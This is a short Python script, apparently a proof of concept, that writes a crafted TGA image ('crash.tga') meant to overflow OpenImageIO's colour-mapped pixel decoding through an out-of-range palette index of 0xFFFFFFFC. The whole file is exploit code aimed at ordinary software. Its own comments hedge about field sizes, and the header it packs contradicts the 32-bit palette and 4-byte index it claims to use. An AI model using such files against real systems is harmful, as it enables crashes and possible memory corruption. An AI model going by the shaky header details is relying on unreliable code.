import struct
# Create a malicious TGA file to trigger the overflow
# TGA Header: ID length(1), Color map type(1), Image type(1)
# Color map spec(5), Image spec(10)
# We need specific conditions to hit k=0xFFFFFFFC and palbytespp=4
# This is a simplified PoC structure demonstrating the concept.
def generate_malicious_tga(filename):
with open(filename, 'wb') as f:
# TGA Header (Simplified)
# Image type 1 (Uncompressed, Color-mapped)
header = b'\x00\x01\x01'
# Color map spec: first entry index (2 bytes), length (2 bytes), entry size (1 byte)
# Setting entry size to 4 bytes (palbytespp = 4)
colormap_spec = struct.pack('<HHB', 0, 256, 8) # 8 bits per entry? No, usually 24/32. Let's assume 32bit map.
# To trigger k=0xFFFFFFFC, the image data needs to contain this index.
# Image spec: x(2), y(2), width(2), height(2), pixel depth(1), descriptor(1)
width = 1
height = 1
image_spec = struct.pack('<HHHHBB', 0, 0, width, height, 8, 0)
f.write(header + colormap_spec + image_spec)
# Write Color Map Data (dummy)
f.write(b'\x00' * 256 * 4)
# Write Image Data (Pixel Index)
# Writing 0xFFFFFFFC as the index to trigger the bug in decode_pixel
# Note: Dependent on how OpenImageIO reads the byte stream for indices.
# If it reads a byte, max is 0xFF. If it reads a short/long, 0xFFFFFFFC is possible.
# Assuming the context allows for this index value.
f.write(struct.pack('<I', 0xFFFFFFFC))
if __name__ == "__main__":
generate_malicious_tga('crash.tga')
print('Malicious TGA file generated: crash.tga')